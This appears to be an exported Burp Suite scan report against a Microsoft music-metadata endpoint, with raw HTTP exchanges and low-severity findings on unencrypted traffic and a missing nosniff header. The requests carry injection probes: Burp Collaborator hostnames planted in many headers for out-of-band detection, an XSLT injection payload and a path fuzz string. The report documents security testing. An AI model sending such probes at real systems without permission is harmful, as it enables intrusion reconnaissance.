POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A5C8E268-11DA-4B01-B686-2CAF1B2B5541&tm3uarm5p2=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@2hkb7bmz4by46kn4mujg98sr4ia9833rs.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1484
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://hteqjqyegqajizzjy9vvln46gxmokhn5c.burpcollaborator.net/ref
X-Real-IP: spoofed.z338t88wq8k1sh918r5dv5eoqfw6uzynn.burpcollaborator.net
Forwarded: for=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;by=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;host=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net
X-Forwarded-For: spoofed.sc8121hpz1tu1aiuhke64ynhz85z3tthi.burpcollaborator.net
Contact: root@m8vvyvdjvvpox4eodea00sjbv21tznqbf.burpcollaborator.net
From: root@p7xyxycmuyorw7drch93zvieu50wyqqef.burpcollaborator.net
True-Client-IP: spoofed.x426u69ur6lztfaz9p6bw3fmrdx4vyomd.burpcollaborator.net
X-Wap-Profile: http://rhc070mo40yt69ntmjj59xsg47ay8s2gr.burpcollaborator.net/wap.xml
Client-ip: spoofed.vrq4h4wse48xgdxxwnt9j12kebk2iwek3.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID>
<album>
<title>
<text>iTunes Originals - Jack Johnson</text>
<word>iTunes</word>
<word>null</word>
<word>Jack</word>
<word>Johnson</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
</album>
<track>
<title>
<text>A Pirate Looks at Forty (iTunes Originals Version)</text>
<word>A</word>
<word>Pirate</word>
<word>Looks</word>
<word>at</word>
<word>Forty</word>
<word>iTunes</word>
<word>Originals</word>
<word>Version</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
<trackNumber>10</trackNumber>
<filename>10 A Pirate Looks at Forty (iTunes O.m4a</filename>
<trackDuration>173429</trackDuration>
<bitrate>260384</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:16:13 GMT
Connection: close

<METADATA><mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Rare Word Supertoken</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID><WMCollectionID>0b714470-ccde-4d65-9e9a-4883263fe649</WMCollectionID><WMCollectionGroupID>0b714470-ccde-4d65-9e9a-4883263fe649</WMCollectionGroupID><uniqueFileID>AMGa_id=R 2426384</uniqueFileID><albumTitle>Jack Johnson & Friends: The Best of Kokua Festival</albumTitle><albumArtist>Jack Johnson</albumArtist><releaseDate>2012-04-17</releaseDate><label>Universal Republic</label><genre>Folk</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>5</publisherRating><buyParams>providerName=AMG&albumID=0B714470-CCDE-4D65-9E9A-4883263FE649&a_id=R%20%202426384&album=Jack%20Johnson%20%26%20Friends:%20The%20Best%20of%20Kokua%20Festival&artistID=A456CD46-5D9D-4A11-A065-13A28FA30BCA&p_id=P%20%20%20468749&artist=Jack%20Johnson</buyParams><largeCoverParams>200/drS100/S122/S12272HTK7Z.jpg</largeCoverParams><smallCoverParams>075/drS100/S122/S12272HTK7Z.jpg</smallCoverParams><moreInfoParams>a_id=R%20%202426384</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>7ed41413-0380-48c7-b664-0fe3d71f6004</WMContentID><trackRequestID></trackRequestID><trackTitle>Better Together</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057381</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>f4af5daa-8214-4283-9c8f-51790370bbc6</WMContentID><trackRequestID></trackRequestID><trackTitle>Cry Cry Cry</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057380</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Jack Johnson; Ziggy Marley</trackPerformer><trackComposer>Jack Johnson; Ziggy Marley</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>02c54ee0-1a2e-4c0c-ae5e-daa5b78e9afb</WMContentID><trackRequestID>0</trackRequestID><trackTitle>A Pirate Looks at Forty</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057379</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Dave Matthews; Jack Johnson; Tim Reynolds</trackPerformer><trackComposer>Jimmy Buffett</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>47637200-5c3b-4329-a5ae-83a54f2f143e</WMContentID><trackRequestID></trackRequestID><trackTitle>Mudfootball</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057378</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>6ef63829-8d36-4b5d-9344-829b9279b86c</WMContentID><trackRequestID></trackRequestID><trackTitle>Constellations</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057377</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c8a23f46-129c-43b8-9a2a-583f9392618f</WMContentID><trackRequestID></trackRequestID><trackTitle>Take It Easy</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057376</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Jack Johnson; Jackson Browne</trackPerformer><trackComposer>Glenn Frey; Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>92a08435-ba38-4a1f-869b-d3a618d12b07</WMContentID><trackRequestID></trackRequestID><trackTitle>Island Style</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057375</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Jack Johnson; John Cruz</trackPerformer><trackComposer>John Cruz</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>0d7947e3-e26e-429f-90e6-b493e056c7c9</WMContentID><trackRequestID></trackRequestID><trackTitle>Breakdown</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057369</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Dan Nakamura; Jack Johnson; Paul Huston</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>17a18372-95fa-4922-8860-bb52563a2387</WMContentID><trackRequestID></trackRequestID><trackTitle>Further on Down the Road</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057374</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Jack Johnson; Taj Mahal</trackPerformer><trackComposer>Taj Mahal</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>6f4b85b6-4ada-4cae-8711-fa1764237c8c</WMContentID><trackRequestID></trackRequestID><trackTitle>Welcome to Jamrock</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057373</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Damian Marley; Jack Johnson</trackPerformer><trackComposer>Damian Marley; Ini Kamoze; Robert Russell; Stephen Marley</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bc5895be-163c-4637-8ec4-2859996ca64a</WMContentID><trackRequestID></trackRequestID><trackTitle>High Tide or Low Tide</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057372</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Ben Harper; Jack Johnson</trackPerformer><trackComposer>Bob Marley</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>324ea500-e3e0-46cc-9d23-94874447bf84</WMContentID><trackRequestID></trackRequestID><trackTitle>Blue Eyes Crying in the Rain</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057371</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Jack Johnson; Willie Nelson</trackPerformer><trackComposer>Fred Rose</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>b3f6a0fb-ae9b-4ed4-9aec-cab956bbae3d</WMContentID><trackRequestID></trackRequestID><trackTitle>I Shall Be Released</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057370</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Eddie Vedder; Jack Johnson; Zach Gill</trackPerformer><trackComposer>Bob Dylan</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A5C8E268-11DA-4B01-B686-2CAF1B2B5541&qz8457=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@2hkb7bmz4by46kn4mujg98sr4ia9833rs.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1484
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://hteqjqyegqajizzjy9vvln46gxmokhn5c.burpcollaborator.net/ref
X-Real-IP: spoofed.z338t88wq8k1sh918r5dv5eoqfw6uzynn.burpcollaborator.net
Forwarded: for=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;by=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;host=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net
X-Forwarded-For: spoofed.sc8121hpz1tu1aiuhke64ynhz85z3tthi.burpcollaborator.net
Contact: root@m8vvyvdjvvpox4eodea00sjbv21tznqbf.burpcollaborator.net
From: root@p7xyxycmuyorw7drch93zvieu50wyqqef.burpcollaborator.net
True-Client-IP: spoofed.x426u69ur6lztfaz9p6bw3fmrdx4vyomd.burpcollaborator.net
X-Wap-Profile: http://rhc070mo40yt69ntmjj59xsg47ay8s2gr.burpcollaborator.net/wap.xml
Client-ip: spoofed.vrq4h4wse48xgdxxwnt9j12kebk2iwek3.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID>
<album>
<title>
<text>iTunes Originals - Jack Johnson</text>
<word>iTunes</word>
<word>zull</word>
<word>Jack</word>
<word>Johnson</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
</album>
<track>
<title>
<text>A Pirate Looks at Forty (iTunes Originals Version)</text>
<word>A</word>
<word>Pirate</word>
<word>Looks</word>
<word>at</word>
<word>Forty</word>
<word>iTunes</word>
<word>Originals</word>
<word>Version</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
<trackNumber>10</trackNumber>
<filename>10 A Pirate Looks at Forty (iTunes O.m4a</filename>
<trackDuration>173429</trackDuration>
<bitrate>260384</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

8. Unencrypted communications
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

References

Vulnerability classifications

CWE-326: Inadequate Encryption Strength

9. Content Sniffing not disabled
Previous Next

There are 5 instances of this issue:

/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx
/cdinfo/GetMDRCDPOSTURL.aspx
/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
/cdinfo/getmdrcd.aspx
/favicon.ico

Issue description

There was no "X-Content-Type-Options" HTTP header with the value nosniff set in the response. The lack of this header causes that certain browsers, try to determine the content type and encoding of the response even when these properties are defined correctly. This can make the web application vulnerable against Cross-Site Scripting (XSS) attacks. E.g. the Internet Explorer and Safari treat responses with the content type text/plain as HTML, if they contain HTML tags.

Issue remediation

Set the following HTTP header at least in all responses which contain user input:

X-Content-Type-Options: nosniff

9.1. http://info.music.metaservices.microsoft.com/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Request 1

POST /a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 415
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/>
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
XSLT Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/>
</xsl:template>
</xsl:stylesheet>

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 08 Sep 2017 18:23:03 GMT
Connection: close
Content-Length: 11

Bad Request

9.2. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/GetMDRCDPOSTURL.aspx

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Request 1

GET /cdinfo/GetMDRCDPOSTURL.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=01D6306F-D2BB-4CAD-8CAC-B7D78131197F HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5tzejey2gea7inz7yxvjlb4uglmcfbkz9.burpcollaborator.net
Accept-Encoding: gzip, deflate
Host: info.music.metaservices.microsoft.com
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://cxdlnl29kleemu3e24zqpi81ksqjjig65.burpcollaborator.net/ref
X-Real-IP: spoofed.el3nbnqb8n2gawrgq6nsdkw38uel7k58u.burpcollaborator.net
Forwarded: for=spoofed.aq4jgjv7dj7cfswcv2soig1zdqjhcgb40.burpcollaborator.net;by=spoofed.aq4jgjv7dj7cfswcv2soig1zdqjhcgb40.burpcollaborator.net;host=spoofed.aq4jgjv7dj7cfswcv2soig1zdqjhcgb40.burpcollaborator.net
X-Forwarded-For: spoofed.qkezazpn7z1s98qspim4cwvf76dx6w6kv.burpcollaborator.net
Contact: root@bbqk1kg8yksd0thdg3dp3hm0yr4ixhy5n.burpcollaborator.net
From: root@rvq0l00oi0ctk91t0jx5nx6gi7oyhxjl8.burpcollaborator.net
True-Client-IP: spoofed.jwjsms1gjsdll12l1byxop78jzpqiplda.burpcollaborator.net
X-Wap-Profile: http://468dwdb1tdn6vmc6bw8iyahttkzbsawyl.burpcollaborator.net/wap.xml
Client-ip: spoofed.fm5ocorc9o3hbxshr7otelx49vfm8myan.burpcollaborator.net

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 03 Sep 2017 23:45:06 GMT
Connection: close
Content-Length: 168

http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=01D6306F-D2BB-4CAD-8CAC-B7D78131197F

9.3. http://info.music.metaservices.microsoft.com/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Request 1

POST /cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 415
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/>
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
XSLT Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/>
</xsl:template>
</xsl:stylesheet>

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 08 Sep 2017 18:23:10 GMT
Connection: close
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

9.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=01D6306F-D2BB-4CAD-8CAC-B7D78131197F HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@3y2coc30lcf5nl453v0hq99sljrakajy8.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1323
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://ybd717gvy7s00gh0gqdc34mnye45x5otd.burpcollaborator.net/ref
X-Real-IP: spoofed.oh9x7xml4xyq66nqmgj29usd44av3vvjk.burpcollaborator.net
Forwarded: for=spoofed.78dgygd4vgp9xpe9dzal0djwvn1euen2c.burpcollaborator.net;by=spoofed.78dgygd4vgp9xpe9dzal0djwvn1euen2c.burpcollaborator.net;host=spoofed.78dgygd4vgp9xpe9dzal0djwvn1euen2c.burpcollaborator.net
X-Forwarded-For: spoofed.oogxextlbx5qd6uqtgq2guzdb4hvav4jt.burpcollaborator.net
Contact: root@pngydysmay4rc7trshp3fvyea5gw9w4kt.burpcollaborator.net
From: root@3swcicx0fc95hly5xvuhk93sfjlaeaayz.burpcollaborator.net
True-Client-IP: spoofed.juhskszghsblj10lzbwxmp58hznqgqde2.burpcollaborator.net
X-Wap-Profile: http://vml4c4rs943xbdsxrno9e1xk9bf2826qv.burpcollaborator.net/wap.xml
Client-ip: spoofed.punykyzmhybrj70rzhw3mv5eh5nwgwgk5.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>01D6306F-D2BB-4CAD-8CAC-B7D78131197F</mdqRequestID>
<album>
<title>
<text>What You Waiting For - Single</text>
<word>What</word>
<word>You</word>
<word>Waiting</word>
<word>For</word>
<word>Single</word>
</title>
<artist>
<text>Gwen Stefani</text>
<word>Gwen</word>
<word>Stefani</word>
</artist>
</album>
<track>
<title>
<text>What You Waiting For</text>
<word>What</word>
<word>You</word>
<word>Waiting</word>
<word>For</word>
</title>
<artist>
<text>Gwen Stefani</text>
<word>Gwen</word>
<word>Stefani</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 What You Waiting For.m4a</filename>
<trackDuration>221286</trackDuration>
<bitrate>266480</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 03 Sep 2017 23:45:06 GMT
Connection: close

<METADATA><mdqRequestID>01D6306F-D2BB-4CAD-8CAC-B7D78131197F</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>01D6306F-D2BB-4CAD-8CAC-B7D78131197F</mdqRequestID><WMCollectionID>9bc72806-9913-4e5e-b071-7067ef3e6ddb</WMCollectionID><WMCollectionGroupID>9bc72806-9913-4e5e-b071-7067ef3e6ddb</WMCollectionGroupID><uniqueFileID>AMGa_id=R 848462</uniqueFileID><albumTitle>What You Waiting For? (Single)</albumTitle><albumArtist>Gwen Stefani</albumArtist><releaseDate>2004-09-28</releaseDate><label>Interscope</label><genre>Pop</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>3</publisherRating><buyParams>providerName=AMG & Microsoft&albumID=9BC72806-9913-4E5E-B071-7067EF3E6DDB&a_id=R%20%20%20848462&album=What%20You%20Waiting%20For%3F%20(Single)&artistID=3E94E7EE-5F67-4AC2-9325-6CA5E15C2390&p_id=P%20%20%20268784&artist=Gwen%20Stefani</buyParams><largeCoverParams></largeCoverParams><smallCoverParams></smallCoverParams><moreInfoParams>a_id=R%20%20%20848462</moreInfoParams><dataProvider>AMG & Microsoft</dataProvider><dataProviderParams>Provider=AMG & Microsoft</dataProviderParams><dataProviderLogo>Provider=AMG & Microsoft</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>78788a64-04ce-4d00-88aa-5cf9b7e175f3</WMContentID><trackRequestID>0</trackRequestID><trackTitle>What You Waiting For?</trackTitle><uniqueFileID></uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Gwen Stefani</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>fc93efe9-0e24-4289-b231-6019a48d8661</WMContentID><trackRequestID></trackRequestID><trackTitle>What You Waiting For? (Jarques Mix 1)</trackTitle><uniqueFileID></uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Gwen Stefani</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>4e170e2c-39a7-40bd-9839-a1d293376bab</WMContentID><trackRequestID></trackRequestID><trackTitle>What You Waiting For? (Jarques Mix 2)</trackTitle><uniqueFileID></uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Gwen Stefani</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

9.5. http://info.music.metaservices.microsoft.com/favicon.ico
Previous Next

Summary

	Severity:	Low
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/favicon.ico

Note: This issue was generated by the Burp extension: Additional Scanner Checks.

Request 1

GET /favicon.ico HTTP/1.1
Host: info.music.metaservices.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@e0fnji4zyuw019qn2qw2ebp62x8o3n1bq.burpcollaborator.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: MC1=GUID=2c62165baf54c140947f1771678b97db&HASH=5b16&LV=201708&V=4&LU=1503333421328; A=I&I=AxUFAAAAAADLCQAAViokRx1MGhbmifiYMTtAZw!!&V=4; MUID=0B32857C38686C6603008FB53C686FA2
Connection: close
Cache-Control: no-transform
Client-ip: spoofed.vlk44zpgjbhhmqb4n7hjzsannet5o4es3.burpcollaborator.net
From: root@q8zzrucb664c9lyza24emnxia9g0bz2nr.burpcollaborator.net
X-Wap-Profile: http://f0gojj40yvw11aqo2rw3ecp72y8p3ovck.burpcollaborator.net/wap.xml
Forwarded: for=spoofed.9jti2dnuhpfvk49illfxx681lsrjmif64.burpcollaborator.net;by=spoofed.9jti2dnuhpfvk49illfxx681lsrjmif64.burpcollaborator.net;host=spoofed.9jti2dnuhpfvk49illfxx681lsrjmif64.burpcollaborator.net
X-Forwarded-For: spoofed.8t2hccxtropuu3jhvkpw75i0vr1iwhq5f.burpcollaborator.net
Contact: root@zor873skmfklpue8qbkn2wdrqiw9r8mwb.burpcollaborator.net
